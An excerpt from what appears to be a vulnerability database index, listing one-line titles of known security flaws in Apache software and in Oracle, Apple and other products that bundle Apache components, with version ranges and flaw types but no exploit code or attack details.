3917| [133314] Apache Airflow up to 1.10.2 Metadata Database cross site scripting
3918| [133290] Apache Tomcat up to 8.5.37/9.0.14 HTTP2 Stream Execution denial of service
3919| [133112] Apache HTTP Server up to 2.4.38 mod_auth_digest race condition privilege escalation
3920| [133111] Apache HTTP Server 2.4.37/2.4.38 mod_ssl Bypass privilege escalation
3921| [133092] Airsonic 10.2.1 org.apache.commons.lang.RandomStringUtils RecoverController.java java.util.Random weak authentication
3922| [132568] Apache JSPWiki up to 2.11.0.M2 URL User information disclosure
3923| [132567] Apache JSPWiki up to 2.11.0.M2 URL cross site scripting
3924| [132566] Apache ActiveMQ up to 5.15.8 MQTT Frame Memory denial of service
3925| [132565] Apache HBase up to 2.1.3 REST Server Request privilege escalation
3926| [132183] Apache Mesos up to pre-1.4.x Docker Image Code Execution
3927| [131988] Apache Karaf up to 4.2.2 kar Deployer directory traversal
3928| [131859] Apache Hadoop up to 2.9.1 privilege escalation
3929| [131479] Apache Solr up to 7.6 HTTP GET Request Server-Side Request Forgery
3930| [131446] Apache Solr up to 5.0.5/6.6.5 Config API HTTP POST Request Code Execution
3931| [131385] Apache Qpid Broker-J up to 6.x/7.0.6/7.1.0 AMQP Command Crash denial of service
3932| [131315] Apache Mesos up to pre-1.4.x Mesos Masters Rendering JSON Payload Recursion denial of service
3933| [131236] Apache Airflow up to 1.10.1 Metadata Database cross site scripting
3934| [130755] Apache JSPWiki up to 2.10.5 URL cross site scripting
3935| [130629] Apache Guacamole Cookie Flag weak encryption
3936| [130628] Apache Hadoop up to 3.0.0 HDFS information disclosure
3937| [130529] Apache Subversion 1.10.0/1.10.1/1.10.2/1.10.3/1.11.0 mod_dav_svn Directory Crash denial of service
3938| [130353] Apache Open Office up to 4.1.5 Document Loader String memory corruption
3939| [130341] Apache HTTP Server 2.4.37 mod_ssl Loop denial of service
3940| [130330] Apache HTTP Server up to 2.4.37 mod_session Expired privilege escalation
3941| [130329] Apache HTTP Server 2.4.37 mod_http2 Slowloris denial of service
3942| [130212] Apache Airflow up to 1.10.0 LDAP Auth Backend Certificate weak authentication
3943| [130123] Apache Airflow up to 1.8.2 information disclosure
3944| [130122] Apache Airflow up to 1.8.2 command injection cross site request forgery
3945| [130121] Apache Airflow up to 1.8.2 Webserver Object Code Execution
3946| [129717] Oracle Secure Global Desktop 5.4 Apache HTTP Server denial of service
3947| [129688] Oracle Tape Library ACSLS 8.4 Apache Log4j unknown vulnerability
3948| [129673] Oracle Retail Returns Management 13.3/13.4/14.0/14.1 Apache Commons Fileupload unknown vulnerability
3949| [129672] Oracle Retail Central Office 13.3/13.4/14.0/14.1 Apache Commons Fileupload unknown vulnerability
3950| [129671] Oracle Retail Back Office 13.3/13.4/14.0/14.1 Apache Commons Fileupload unknown vulnerability
3951| [129574] Oracle Outside In Technology 8.5.3/8.5.4 Apache Tomcat denial of service
3952| [129573] Oracle WebLogic Server 10.3.6.0 Apache HTTP Server denial of service
3953| [129563] Oracle Enterprise Repository 12.1.3.0.0 Apache Log4j unknown vulnerability
3954| [129555] Oracle Outside In Technology 8.5.3 Apache Batik denial of service
3955| [129551] Oracle Outside In Technology 8.5.3/8.5.4 Apache Commons FileUpload denial of service
3956| [129542] Oracle API Gateway 11.1.2.4.0 Apache Batik denial of service
3957| [129538] Oracle SOA Suite 12.1.3.0.0/12.2.1.3.0 Apache Batik unknown vulnerability
3958| [129519] Oracle Enterprise Manager Ops Center 12.2.2/12.3.3 Apache ActiveMQ unknown vulnerability
3959| [129508] Oracle Applications Manager up to 12.2.8 Apache Derby unknown vulnerability
3960| [129507] Oracle Mobile Field Service up to 12.2.8 Apache Log4j unknown vulnerability
3961| [129505] Oracle Email Center up to 12.2.8 Apache Log4j unknown vulnerability
3962| [129504] Oracle CRM Technical Foundation up to 12.2.8 Apache Commons FileUpload unknown vulnerability
3963| [129499] Oracle Partner Management up to 12.2.8 Apache Log4j unknown vulnerability
3964| [129498] Oracle Marketing up to 12.2.8 Apache Commons FileUpload unknown vulnerability
3965| [129480] Oracle Communications WebRTC Session Controller up to 7.1 Apache Batik unknown vulnerability
3966| [129479] Oracle Communications Diameter Signaling Router up to 8.2 Apache Batik unknown vulnerability
3967| [129474] Oracle Communications Diameter Signaling Router up to 8.2 Apache HTTP Server information disclosure
3968| [129472] Oracle Communications WebRTC Session Controller up to 7.1 Apache Struts 1 unknown vulnerability
3969| [129470] Oracle Communications Converged Application Server up to 7.0.0.0 Apache Struts 1 unknown vulnerability
3970| [129463] Oracle Communications WebRTC Session Controller up to 7.1 Apache Log4j unknown vulnerability
3971| [129461] Oracle Communications Services Gatekeeper up to 6.1.0.3.x Apache Commons Collections Fileupload unknown vulnerability
3972| [129460] Oracle Communications Service Broker 6.0 Apache Log4j unknown vulnerability
3973| [129459] Oracle Communications Policy Management up to 12.4 Apache Struts 2 unknown vulnerability
3974| [129458] Oracle Communications Online Mediation Controller 6.1 Apache Log4j unknown vulnerability
3975| [129457] Oracle Communications Diameter Signaling Router up to 8.2 Apache Commons Fileupload unknown vulnerability
3976| [129456] Oracle Communications Converged Application Server 6.1 Apache Log4j unknown vulnerability
3977| [128714] Apache Thrift Java Client Library up to 0.11.0 SASL Negotiation org.apache.thrift.transport.TSaslTransport unknown vulnerability
3978| [128713] Apache Thrift Node.js Static Web Server up to 0.11.0 directory traversal
3979| [128709] Apache Karaf up to 4.1.6/4.2.1 Features Deployer XMLInputFactory XML External Entity
3980| [128575] Apache NetBeans 9.0 Proxy Auto-Config Code Execution
3981| [128369] Apache Tika 1.8-1.19.1 SQLite3Parser Loop sql injection
3982| [128111] Apache NiFi 1.8.0 Template Upload Man-in-the-Middle cross site request forgery
3983| [128110] Apache NiFi 1.8.0 Cluster Request privilege escalation
3984| [128109] Apache NiFi 1.8.0 Error Page message-page.jsp Request Header cross site scripting
3985| [128108] Apache NiFi up to 1.7.x X-Frame-Options Header privilege escalation
3986| [128102] Apache Oozie up to 5.0.0 Workflow XML Impersonation spoofing
3987| [127994] WordPress up to 5.0.0 on Apache httpd MIME Restriction cross site scripting
3988| [127981] Apache OFBiz 16.11.01/16.11.02/16.11.03/16.11.04 HTTP Engine httpService GET Request privilege escalation
3989| [127161] Apache Hadoop 2.7.4/2.7.5/2.7.6 Incomplete Fix CVE-2016-6811 privilege escalation
3990| [127040] Loadbalancer.org Enterprise VA MAX up to 8.3.2 Apache HTTP Server Log cross site scripting
3991| [127007] Apache Spark Request Code Execution
3992| [126791] Apache Hadoop up to 0.23.11/2.7.6/2.8.4/2.9.1/3.0.2 ZIP File unknown vulnerability
3993| [126767] Apache Qpid Proton-J Transport 0.3 Certificate Verification Man-in-the-Middle weak authentication
3994| [126896] Apache Commons FileUpload 1.3.3 on LDAP Manager DiskFileItem File privilege escalation
3995| [126574] Apache Hive up to 2.3.3/3.1.0 Query privilege escalation
3996| [126573] Apache Hive up to 2.3.3/3.1.0 HiveServer2 privilege escalation
3997| [126564] Apache Superset up to 0.22 Pickle Library load Code Execution
3998| [126488] Apache Syncope up to 2.0.10/2.1.1 BPMN Definition xxe privilege escalation
3999| [126487] Apache Syncope up to 2.0.10/2.1.1 cross site scripting
4000| [126346] Apache Tomcat Path privilege escalation
4001| [125922] Apache Impala up to 3.0.0 ALTER privilege escalation
4002| [125921] Apache Impala up to 3.0.0 Queue Injection privilege escalation
4003| [125647] Oracle Agile Engineering Data Management 6.1.3/6.2.0/6.2.1 Install (Apache Tomcat) information disclosure
4004| [125617] Oracle Retail Returns Management 14.1 Apache Batik unknown vulnerability
4005| [125616] Oracle Retail Point-of-Service 13.4/14.0/14.1 Apache Batik unknown vulnerability
4006| [125614] Oracle Retail Central Office 14.1 Apache Batik unknown vulnerability
4007| [125613] Oracle Retail Back Office 13.3/13.4/14/14.1 Apache Batik unknown vulnerability
4008| [125599] Oracle Retail Open Commerce Platform 5.3.0/6.0.0/6.0.1 Apache Log4j unknown vulnerability
4009| [125569] Oracle PeopleSoft Enterprise PeopleTools 8.55/8.56 Apache HTTP Server information disclosure
4010| [125494] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Tomcat information disclosure
4011| [125447] Oracle Business Intelligence Enterprise Edition 11.1.1.7.0/11.1.1.9.0/12.2.1.3.0/12.2.1.4.0 Apache Batik unknown vulnerability
4012| [125428] Oracle Identity Management Suite 11.1.2.3.0/12.2.1.3.0 Apache Log4j unknown vulnerability
4013| [125427] Oracle Identity Analytics 11.1.1.5.8 Apache Log4j unknown vulnerability
4014| [125424] Oracle API Gateway 11.1.2.4.0 Apache Log4j unknown vulnerability
4015| [125423] Oracle BI Publisher 11.1.1.7.0/11.1.1.9.0/12.2.1.3.0/12.2.1.4.0 Apache Log4j unknown vulnerability
4016| [125383] Oracle up to 10.2.0 Apache Trinidad unknown vulnerability
4017| [125379] Oracle up to 10.1.x Apache Struts 1 cross site scripting
4018| [125377] Oracle up to 10.2.0 Apache Commons Collections unknown vulnerability
4019| [125376] Oracle Communications Application Session Controller up to 3.7.0 Apache Commons Collections unknown vulnerability
4020| [125375] Oracle Communications User Data Repository up to 12.1.x Apache Xerces memory corruption
4021| [125248] Apache ActiveMQ up to 5.15.5 Web-based Administration Console queue.jsp Parameter cross site scripting
4022| [125133] Apache Tika up to 1.19 XML Parser reset() denial of service
4023| [124877] Apache PDFbox up to 2.0.11 PDF File denial of service
4024| [124876] Apache Ranger up to 1.1.x UnixAuthenticationService Stack-based memory corruption
4025| [124791] Apache Tomcat up to 7.0.90/8.5.33/9.0.11 URL Open Redirect
4026| [124787] Apache Pony Mail 0.7/0.8/0.9 Statistics Generator Timestamp Data information disclosure
4027| [124447] Apache HTTP Server up to 2.4.34 SETTINGS Frame denial of service
4028| [124346] Apache Mesos pre-1.4.2/1.5.0/1.5.1/1.6.0 on Executor HTTP API String Comparison validation JSON Web Token information disclosure
4029| [124286] Apache Tika up to 1.18 IptcAnpaParser Loop denial of service
4030| [124242] Apache Tika up to 0.18 C:/evil.bat" Directory unknown vulnerability
4031| [124241] Apache Tika up to 0.18 XML Parser Entity Expansion denial of service
4032| [124191] Apache Karaf up to 3.0.8/4.0.8/4.1.0 WebConsole .../gogo/ weak authentication
4033| [124190] Apache Karaf up to 4.1.x sshd privilege escalation
4034| [124152] Apache Camel Mail up to 2.22.0 Path directory traversal
4035| [124143] Apache SpamAssassin up to 3.4.1 PDFInfo Plugin Code Execution
4036| [124134] Apache SpamAssassin up to 3.4.1 Scan Engine HTML::Parser Email denial of service
4037| [124095] PHP up to 5.6.37/7.0.31/7.1.21/7.2.9 Apache2 sapi_apache2.c php_handler cross site scripting
4038| [124024] Apache Mesos 1.4.x/1.5.0 libprocess JSON Payload denial of service
4039| [123814] Apache ActiveMQ Client up to 5.15.5 TLS Hostname Verification Man-in-the-Middle weak authentication
4040| [123393] Apache Traffic Server up to 6.2.2/7.1.3 ESI Plugin Config privilege escalation
4041| [123392] Apache Traffic Server 6.2.2 TLS Handshake Segmentation Fault denial of service
4042| [123391] Apache Traffic Server up to 6.2.2/7.1.3 Range Request Performance denial of service
4043| [123390] Apache Traffic Server up to 6.2.2/7.1.3 Request HTTP Smuggling privilege escalation
4044| [123369] Apache Traffic Server up to 6.2.2/7.1.3 ACL remap.config Request denial of service
4045| [123197] Apache Sentry up to 2.0.0 privilege escalation
4046| [123145] Apache Struts up to 2.3.34/2.5.16 Namespace Code Execution
4047| [123144] Apache Cayenne up to 4.1.M1 CayenneModeler XML File File Transfer privilege escalation
4048| [122981] Apache Commons Compress 1.7 ZipArchiveInputStream ZIP Archive denial of service
4049| [122889] Apache HTTP Server up to 2.2.31/2.4.23 mod_userdir HTTP Response Splitting privilege escalation
4050| [122800] Apache Spark 1.3.0 REST API weak authentication
4051| [122642] Apache Airflow up to 1.8.x 404 Page Reflected cross site scripting
4052| [122568] Apache Tomcat up to 8.5.31/9.0.9 Connection Reuse weak authentication
4053| [122567] Apache Axis 1.0./1.1/1.2/1.3/1.4 cross site scripting
4054| [122556] Apache Tomcat up to 7.0.86/8.0.51/8.5.30/9.0.7 UTF-8 Decoder Loop denial of service
4055| [122531] Apache Tomcat up to 7.0.88/8.0.52/8.5.31/9.0.9 WebSocket Client unknown vulnerability
4056| [122456] Apache Camel up to 2.20.3/2.21.0 XSD Validator XML External Entity
4057| [122455] Apache Tomcat Native up to 1.1.34/1.2.16 OSCP Revoked Certificate weak authentication
4058| [122454] Apache Tomcat Native up to 1.1.34/1.2.16 OSCP Responder Revoked Certificate weak authentication
4059| [122214] Apache Kafka up to 0.9.0.1/0.10.2.1/0.11.0.2/1.0.0 Broker Request Data Loss denial of service
4060| [122202] Apache Kafka up to 0.10.2.1/0.11.0.1 SASL Impersonation spoofing
4061| [122101] Docker Skeleton Runtime for Apache OpenWhisk Docker Action dockerskeleton:1.3.0 privilege escalation
4062| [122100] PHP Runtime for Apache OpenWhisk Docker Action action-php-v7.2:1.0.0 privilege escalation
4063| [122012] Apache Ignite up to 2.5 Serialization privilege escalation
4064| [121911] Apache Ambari up to 2.5.x/2.6.2 Log Message Credentials information disclosure
4065| [121910] Apache HTTP Server 2.4.33 mod_md HTTP Requests denial of service
4066| [121854] Oracle Tape Library ACSLS up to ACSLS 8.4.0-2 Apache Commons Collections unknown vulnerability
4067| [121752] Oracle Insurance Policy Administration 10.0/10.1/10.2/11.0 Apache Log4j unknown vulnerability
4068| [121370] Apache Spark up to 2.1.2/2.2.1/2.3.0 URL cross site scripting
4069| [121354] Apache CouchDB HTTP API Code Execution
4070| [121144] Apache LDAP API up to 1.0.1 SSL Filter information disclosure
4071| [121143] Apache Storm up to 0.10.2/1.0.6/1.1.2/1.2.1 Cluster privilege escalation
4072| [120436] Apache CXF Fediz up to 1.4.3 Application Plugin unknown vulnerability
4073| [120310] Apache PDFbox up to 1.8.14/2.0.10 AFMParser Loop denial of service
4074| [120168] Apache CXF weak authentication
4075| [120080] Apache Cassandra up to 3.11.1 JMX/RMI Interface RMI Request privilege escalation
4076| [120043] Apache HBase up to 1.2.6.0/1.3.2.0/1.4.4/2.0.0 Thrift 1 API Server weak authentication
4077| [119723] Apache Qpid Broker-J 7.0.0/7.0.1/7.0.2/7.0.3/7.0.4 AMQP Messages Crash denial of service
4078| [122569] Apache HTTP Server up to 2.4.33 HTTP2 Request denial of service
4079| [119486] Apache Geode up to 1.4.0 Security Manager Code Execution
4080| [119306] Apache MXNet Network Interface privilege escalation
4081| [118999] Apache Storm up to 1.0.6/1.1.2/1.2.1 Archive directory traversal
4082| [118996] Apache Storm up to 1.0.6/1.1.2/1.2.1 Daemon spoofing
4083| [118644] Apple macOS up to 10.13.5 apache_mod_php unknown vulnerability
4084| [118200] Apache Batik up to 1.9 Deserialization unknown vulnerability
4085| [118143] Apache NiFi activemq-client Library Deserialization denial of service
4086| [118142] Apache NiFi 1.6.0 SplitXML xxe privilege escalation
4087| [118051] Apache Zookeeper up to 3.4.9/3.5.3-beta weak authentication
4088| [117997] Apache ORC up to 1.4.3 ORC File Recursion denial of service
4089| [117825] Apache Tomcat up to 7.0.88/8.0.52/8.5.31/9.0.8 CORS Filter privilege escalation
4090| [117405] Apache Derby up to 10.14.1.0 Network Server Network Packet privilege escalation
4091| [117347] Apache Ambari up to 2.6.1 HTTP Request directory traversal
4092| [117265] LibreOffice/Apache Office Writer SMB Connection XML Document information disclosure
4093| [117143] Apache uimaj/uima-as/uimaFIT/uimaDUCC XML XXE information disclosure
4094| [117117] Apache Tika up to 1.17 ChmParser Loop denial of service
4095| [117116] Apache Tika up to 1.17 BPGParser Loop denial of service
4096| [117115] Apache Tika up to 1.17 tika-server command injection
4097| [116929] Apache Fineract getReportType Parameter privilege escalation
4098| [116928] Apache Fineract REST Endpoint Parameter privilege escalation
4099| [116927] Apache Fineract MakercheckersApiResource Parameter sql injection
4100| [116926] Apache Fineract REST Parameter privilege escalation
4101| [116574] Apache wicket-jquery-ui up to 6.29.0/7.10.1/8.0.0-M9.1 WYSIWYG Editor privilege escalation
4102| [116622] Oracle Enterprise Manager for MySQL Database 12.1.0.4 EM Plugin: General (Apache Tomcat) unknown vulnerability
4103| [115931] Apache Solr up to 6.6.2/7.2.1 XML Data Parameter XML External Entity
4104| [115883] Apache Hive up to 2.3.2 privilege escalation
4105| [115882] Apache Hive up to 2.3.2 xpath_short information disclosure
4106| [115881] Apache DriverHive JDBC Driver up to 2.3.2 Escape Argument Bypass privilege escalation
4107| [115518] Apache Ignite 2.3 Deserialization privilege escalation
4108| [115260] EMC RSA Authentication Agent for Web up to 8.0.1 on IIS/Apache cross site scripting
4109| [115259] EMC RSA Authentication Agent for Web up to 8.0.1 on IIS/Apache Cookie Stack-based memory corruption
4110| [115500] CA Workload Control Center up to r11.4 SP5 Apache MyFaces Component Code Execution
4111| [115121] Apache Struts REST Plugin up to 2.5.15 Xstream XML Data denial of service
4112| [115061] Apache HTTP Server up to 2.4.29 HTTP Digest Authentication Challenge HTTP Requests Replay privilege escalation
4113| [115060] Apache HTTP Server up to 2.4.29 mod_cache_socache Request Header Crash denial of service
4114| [115059] Apache HTTP Server up to 2.4.29 HTTP2 NULL Pointer Dereference denial of service
4115| [115058] Apache HTTP Server up to 2.4.29 HTTP Header Crash denial of service
4116| [115057] Apache HTTP Server up to 2.4.29 mod_session Variable Name Cache privilege escalation
4117| [115039] Apache HTTP Server up to 2.4.29 FilesMatch File Upload privilege escalation
4118| [115038] Apache HTTP Server up to 2.0.65/2.2.34/2.4.29 mod_authnz_ldap Crash denial of service
4119| [114817] Apache Syncope up to 1.2.10/2.0.7 Search Parameter information disclosure
4120| [114816] Apache Syncope up to 1.2.10/2.0.7 XSLT Code Execution
4121| [114717] Apache Commons 1.11/1.12/1.13/1.14/1.15 ZIP Archive ZipFile/ZipArchiveInputStream denial of service
4122| [114661] Apache Allura up to 1.8.0 HTTP Response Splitting privilege escalation
4123| [114400] Apache Tomcat JK ISAPI Connector up to 1.2.42 IIS/ISAPI privilege escalation
4124| [114258] Apache HTTP Server up to 2.4.22 mod_cluster Segmentation Fault denial of service
4125| [114086] Apache ODE 1.3.3 ODE Process Deployment Web Service directory traversal
4126| [113955] Apache Xerces-C up to 3.2.0 XML Parser NULL Pointer Dereference denial of service
4127| [113945] Apache Tomcat up to 7.0.84/8.0.49/8.5.27/9.0.4 URL Pattern Empty String privilege escalation
4128| [113944] Apache OpenMeetings up to 3.x/4.0.1 CRUD Operation denial of service
4129| [113905] Apache Traffic Server up to 5.2.x/5.3.2/6.2.0/7.0.0 TLS Handshake Core Dump denial of service
4130| [113904] Apache Traffic Server up to 6.2.0 Host Header privilege escalation
4131| [113895] Apache Geode up to 1.3.x Code Execution
4132| [113894] Apache Geode up to 1.3.x TcpServer Code Execution
4133| [113888] Apache James Hupa WebMail 0.0.2 cross site scripting
4134| [113813] Apache Geode Cluster up to 1.3.x Secure Mode privilege escalation
4135| [113747] Apache Tomcat Servlets privilege escalation
4136| [113647] Apache Qpid up to 0.30 qpidd Broker AMQP Message Crash denial of service
4137| [113645] Apache VCL up to 2.1/2.2.1/2.3.1 Web GUI/XMLRPC API privilege escalation
4138| [113560] Apache jUDDI Console 3.0.0 Log Entries spoofing
4139| [113571] Apache Oozie up to 4.3.0/5.0.0-beta1 XML Data XML File privilege escalation
4140| [113569] Apache Karaf up to 4.0.7 LDAPLoginModule LDAP injection denial of service
4141| [113273] Apache JMeter 2.x/3.x Distributed Test Only privilege escalation
4142| [113198] Apache Qpid Dispatch Router 0.7.0/0.8.0 AMQP denial of service
4143| [113186] Apache JMeter 2.x/3.x Distributed Test Only privilege escalation
4144| [113145] Apache Thrift up to 0.9.3 Go Client Library privilege escalation
4145| [113106] Apache jUDDI up to 3.3.3 XML Data WADL2Java/WSDL2Java XML Document privilege escalation
4146| [113105] Apache Qpid Broker-J 7.0.0 AMQP Crash denial of service
4147| [112885] Apache Allura up to 1.8.0 File information disclosure
4148| [112856] Apache CloudStack up to 4.8.1.0/4.9.0.0 API weak authentication
4149| [112855] Apache CloudStack 4.1.0/4.1.1 API information disclosure
4150| [112678] Apache Tomcat up to 7.0.82/8.0.47/8.5.23/9.0.1 Bug Fix 61201 privilege escalation
4151| [112677] Apache Tomcat Native Connector up to 1.1.34/1.2.14 OCSP Checker Client weak authentication
4152| [112625] Apache POI up to 3.16 Loop denial of service
4153| [112448] Apache NiFi up to 1.3.x Deserialization privilege escalation
4154| [112396] Apache Hadoop 2.7.3/2.7.4 YARN NodeManager Credentials information disclosure
4155| [112339] Apache NiFi 1.5.0 Header privilege escalation
4156| [112330] Apache NiFi 1.5.0 Header HTTP Request privilege escalation
4157| [112314] NetGain Enterprise Manager 7.2.730 Build 1034 org.apache.jsp.u.jsp.tools.exec_jsp Servlet Parameter privilege escalation
4158| [112253] Apache Hadoop up to 0.23.x/2.7.4/2.8.2 MapReduce Job History Server Configuration File privilege escalation
4159| [112171] Oracle Secure Global Desktop 5.3 Apache Log4j privilege escalation
4160| [112164] Oracle Agile PLM 9.3.5/9.3.6 Apache Tomcat unknown vulnerability
4161| [112161] Oracle Agile PLM 9.3.3/9.3.4/9.3.5/9.3.6 Apache Tomcat privilege escalation
4162| [112158] Oracle Autovue for Agile Product Lifecycle Management 21.0.0/21.0.1 Apache Log4j privilege escalation
4163| [112156] Oracle Agile PLM 9.3.3/9.3.4/9.3.5/9.3.6 Apache Log4j privilege escalation
4164| [112155] Oracle Agile Engineering Data Management 6.1.3/6.2.0/6.2.1 Apache Log4j privilege escalation
4165| [112137] Oracle MICROS Relate CRM Software 10.8.x/11.4.x/15.0.x, Apache Tomcat unknown vulnerability
4166| [112136] Oracle MICROS Retail XBRi Loss Prevention up to 10.8.1 Apache Tomcat privilege escalation
4167| [112133] Oracle Retail Workforce Management 1.60.7/1.64.0 Apache Log4j privilege escalation
4168| [112129] Oracle Retail Assortment Planning 14.1.3/15.0.3/16.0.1 Apache Log4j privilege escalation
4169| [112114] Oracle 9.1 Apache Log4j privilege escalation
4170| [112113] Oracle 9.1 Apache Log4j privilege escalation
4171| [112045] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Tomcat privilege escalation
4172| [112038] Oracle Health Sciences Empirica Inspections 1.0.1.1 Apache Tomcat information disclosure
4173| [112019] Oracle Endeca Information Discovery Integrator 3.1.0/3.2.0 Apache Tomcat privilege escalation
4174| [112017] Oracle WebCenter Portal 11.1.1.9.0/12.2.1.2.0/12.2.1.3.0 Apache Struts 1 cross site scripting
4175| [112011] Oracle Identity Manager 11.1.2.3.0 Apache Commons Collections privilege escalation
4176| [111950] Oracle Database 12.2.0.1 Apache Tomcat information disclosure
4177| [111703] Apache Sling XSS Protection API 1.0.4 URL Encoding cross site scripting
4178| [111556] Apache Geode up to 1.2.x Secure Mode Parameter OQL privilege escalation
4179| [111555] Apache Geode up to 1.2.x Secure Mode OQL privilege escalation
4180| [111540] Apache Geode up to 1.2.x Secure Mode information disclosure
4181| [111519] Apache Sling JCR ContentLoader 2.1.4 xmlreader directory traversal
4182| [111338] Apache DeltaSpike-JSF 1.8.0 cross site scripting
4183| [111330] Apache OFBiz 16.11.01/16.11.02/16.11.03 BIRT Plugin cross site scripting
4184| [110789] Apache Sling up to 1.4.0 Authentication Service Credentials information disclosure
4185| [110785] Apache Drill up to 1.11.0 Query Page unknown vulnerability
4186| [110701] Apache Fineract Query Parameter sql injection
4187| [110484] Apache Synapse up to 3.0.0 Apache Commons Collections Serialized Object Code Injection privilege escalation
4188| [110426] Adobe Experience Manager 6.0/6.1/6.2/6.3 Apache Sling Servlets Post cross site scripting
4189| [110141] Apache Struts up to 2.5.14 REST Plugin denial of service
4190| [110140] Apache Qpid Broker-J up to 0.32 privilege escalation
4191| [110139] Apache Qpid Broker-J up to 6.1.4 AMQP Frame denial of service
4192| [110106] Apache CXF Fediz Spring cross site request forgery
4193| [109766] Apache OpenOffice up to 4.1.3 DOC File Parser WW8Fonts memory corruption
4194| [109750] Apache OpenOffice up to 4.1.3 DOC File Parser ImportOldFormatStyles memory corruption
4195| [109749] Apache OpenOffice up to 4.1.3 PPT File Parser PPTStyleSheet memory corruption
4196| [109606] October CMS Build 412 Apache Configuration File Upload privilege escalation
4197| [109419] Apache Camel up to 2.19.3/2.20.0 camel-castor Java Object Deserialization privilege escalation
4198| [109418] Apache Camel up to 2.19.3/2.20.0 camel-hessian Java Object Deserialization privilege escalation
4199| [109400] Apache CouchDB up to 1.6.x/2.1.0 Database Server Shell privilege escalation
4200| [109399] Apache CouchDB up to 1.6.x/2.1.0 JSON Parser Shell privilege escalation
4201| [109398] Apache CXF 3.1.14/3.2.1 JAX-WS/JAX-RS Attachment denial of service
4202| [108872] Apache Hive up to 2.1.1/2.2.0/2.3.0 Policy Enforcement privilege escalation
4203| [108939] Apple macOS up to 10.13.1 apache unknown vulnerability
4204| [108938] Apple macOS up to 10.13.1 apache denial of service
4205| [108937] Apple macOS up to 10.13.1 apache unknown vulnerability
4206| [108936] Apple macOS up to 10.13.1 apache unknown vulnerability
4207| [108935] Apple macOS up to 10.13.1 apache denial of service
4208| [108934] Apple macOS up to 10.13.1 apache unknown vulnerability
4209| [108933] Apple macOS up to 10.13.1 apache unknown vulnerability
4210| [108932] Apple macOS up to 10.13.1 apache unknown vulnerability
4211| [108931] Apple macOS up to 10.13.1 apache denial of service
4212| [108930] Apple macOS up to 10.13.1 apache unknown vulnerability
4213| [108929] Apple macOS up to 10.13.1 apache denial of service
4214| [108928] Apple macOS up to 10.13.1 apache unknown vulnerability
4215| [108797] Apache Struts up to 2.3.19 TextParseUtiltranslateVariables OGNL Expression privilege escalation
4216| [108795] Apache Traffic Server up to 5.3.0 HTTP2 set_dynamic_table_size memory corruption
4217| [108794] Apache WSS4J up to 1.6.16/2.0.1 Incomplete Fix Leak information disclosure
4218| [108793] Apache Qpid up to 0.30 qpidd Crash denial of service
4219| [108792] Apache Traffic Server up to 5.1.0 Access Restriction privilege escalation
4220| [108791] Apache Wicket up to 1.5.11/6.16.x/7.0.0-M2 Session information disclosure
4221| [108790] Apache Storm 0.9.0.1 Log Viewer directory traversal
4222| [108789] Apache Cordova In-App-Browser Standalone Plugin up to 0.3.1 on iOS CDVInAppBrowser privilege escalation
4223| [108788] Apache Cordova File-Transfer Standalone Plugin up to 0.4.1 on iOS ios/CDVFileTransfer.m spoofing
4224| [108787] Apache HttpClient up to 4.3.0 HttpClientBuilder.java unknown vulnerability
4225| [108786] Apache Wicket up to 1.4.21/1.5.9/6.3.x script Tag cross site scripting
4226| [108783] Apache Hadoop up to 0.23.3/1.0.3/2.0.1 Kerberos Security Feature Key weak encryption
4227| [108782] Apache Xerces2 XML Service denial of service
4228| [108781] Apache jUDDI up to 1.x happyjuddi.jsp Parameter cross site scripting
4229| [108780] Apache jUDDI up to 1.x Log File uddiget.jsp spoofing
4230| [108709] Apache Cordova Android up to 3.7.1/4.0.1 intent URL privilege escalation
4231| [108708] Apache ActiveMQ up to 5.10.0 XML Data XML External Entity
4232| [108707] Apache ActiveMQ up to 1.7.0 XML Data XML External Entity
4233| [108629] Apache OFBiz up to 10.04.01 privilege escalation
4234| [108543] Apache Derby 10.1.2.1/10.2.2.0/10.3.1.4/10.4.1.3 Export File privilege escalation
4235| [108312] Apache HTTP Server on RHEL IP Address Filter privilege escalation
4236| [108297] Apache NiFi up to 0.7.1/1.1.1 Proxy Chain Username Deserialization privilege escalation
4237| [108296] Apache NiFi up to 0.7.1/1.1.1 Cluster Request privilege escalation
4238| [108250] Oracle Secure Global Desktop 5.3 Apache HTTP Server memory corruption
4239| [108245] Oracle Transportation Management up to 6.3.7 Apache Tomcat unknown vulnerability
4240| [108244] Oracle Transportation Management 6.4.1/6.4.2 Apache Commons FileUpload denial of service
4241| [108243] Oracle Agile Engineering Data Management 6.1.3/6.2.0 Apache Commons Collections memory corruption
4242| [108222] Oracle MICROS Retail XBRi Loss Prevention up to 10.8.1 Apache Batik denial of service
4243| [108219] Oracle MICROS Retail XBRi Loss Prevention up to 10.8.1 Apache Tomcat unknown vulnerability
4244| [108217] Oracle Retail Store Inventory Management 13.2.9/14.0.4/14.1.3/15.0.1/16.0.1 Apache Groovy unknown vulnerability
4245| [108216] Oracle Retail Convenience and Fuel POS Software 2.1.132 Apache Groovy unknown vulnerability
4246| [108169] Oracle MySQL Enterprise Monitor up to 3.2.8.2223/3.3.4.3247/3.4.2.4181 Apache Tomcat unknown vulnerability
4247| [108113] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Batik denial of service
4248| [108107] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Tomcat unknown vulnerability
4249| [108102] Oracle Healthcare Master Person Index 4.x Apache Groovy unknown vulnerability
4250| [108085] Oracle Identity Manager 11.1.2.3.0 Apache Struts 1 memory corruption
4251| [108083] Oracle API Gateway 11.1.2.4.0 Apache Batik denial of service
4252| [108080] Oracle GlassFish Server 3.1.2 Apache Commons FileUpload denial of service
4253| [108066] Oracle Management Pack for GoldenGate 11.2.1.0.12 Apache Tomcat memory corruption
4254| [108062] Oracle BI Publisher 11.1.1.7.0/12.2.1.1.0/12.2.1.2.0 Apache ActiveMQ memory corruption
4255| [108060] Oracle Enterprise Manager Ops Center 12.2.2/12.3.2 Apache Groovy unknown vulnerability
4256| [108033] Oracle Primavera Unifier 9.13/9.14/10.x/15.x/16.x, Apache Groovy unknown vulnerability
4257| [108013] Oracle Communications WebRTC Session Controller 7.0/7.1/7.2 Apache Groovy unknown vulnerability
4258| [108011] Oracle Communications Services Gatekeeper 5.1/6.0 Apache Trinidad unknown vulnerability
4259| [107904] Apache Struts up to 2.3.28 Double OGNL Evaluation privilege escalation
4260| [107860] Apache Solr up to 7.0 Apache Lucene RunExecutableListener XML External Entity
4261| [107834] Apache Ranger up to 0.6.1 Change Password privilege escalation
